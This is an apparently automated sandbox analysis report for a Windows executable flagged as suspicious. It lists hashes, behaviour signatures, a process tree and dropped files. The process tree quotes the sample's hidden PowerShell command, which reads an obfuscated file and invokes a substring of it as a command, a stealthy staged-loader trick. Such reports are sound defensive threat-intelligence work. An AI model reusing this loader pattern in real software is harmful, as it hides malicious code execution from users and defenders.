Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24/04/2024, 01:00

General

  • Target

    6000507958.exe

  • Size

    563KB

  • MD5

    e0d35d2fe887cbe0b4de87f1be7d7a17

  • SHA1

    b37f59b0ec54d6c40645837dbb3a18c954346601

  • SHA256

    1ae1583b2be5c21f228a0e925652c9f5013bddf699548ca39b02670576325010

  • SHA512

    9d20fd479a57ccf51c02830744f095b5dfa98707777a8f24968aa0f0e9ac2a4de4ae348831a001b00cae9d750b9372a85248fdd15570a44ca52b90f8cf451256

  • SSDEEP

    12288:8stfWr2z5t/dtpQBEd6XT9Pi8RzDm+EYRfT7d+:8st+r2z5J9Pd6XT9Pi85REYpT7d+

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6000507958.exe
    "C:\Users\Admin\AppData\Local\Temp\6000507958.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Matines=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Moviedom230\Devenustate\Accorder\Uncoincidental\Incurvity.eft';$Intensities=$Matines.SubString(15241,3);.$Intensities($Matines)"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:280

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\nsd140E.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    5aa38904acdcc21a2fb8a1d30a72d92f

    SHA1

    a9ce7d1456698921791db91347dba0489918d70c

    SHA256

    10675f13abaee592f14382349aa35d82fb52aab4e27eef61d0c83dec1f6b73da

    SHA512

    f04740da561d7cd0dea5e839c9e1c339d4a3e63944d3566c94c921a3d170a69918a32dff3f3b43f13d55cc25a2dbb4c21104f062c324308ac5104179766402a3

  • memory/280-13-0x0000000073E80000-0x000000007442B000-memory.dmp

    Filesize

    5.7MB

  • memory/280-14-0x0000000002890000-0x00000000028D0000-memory.dmp

    Filesize

    256KB

  • memory/280-15-0x0000000073E80000-0x000000007442B000-memory.dmp

    Filesize

    5.7MB

  • memory/280-16-0x0000000002890000-0x00000000028D0000-memory.dmp

    Filesize

    256KB

  • memory/280-17-0x0000000073E80000-0x000000007442B000-memory.dmp

    Filesize

    5.7MB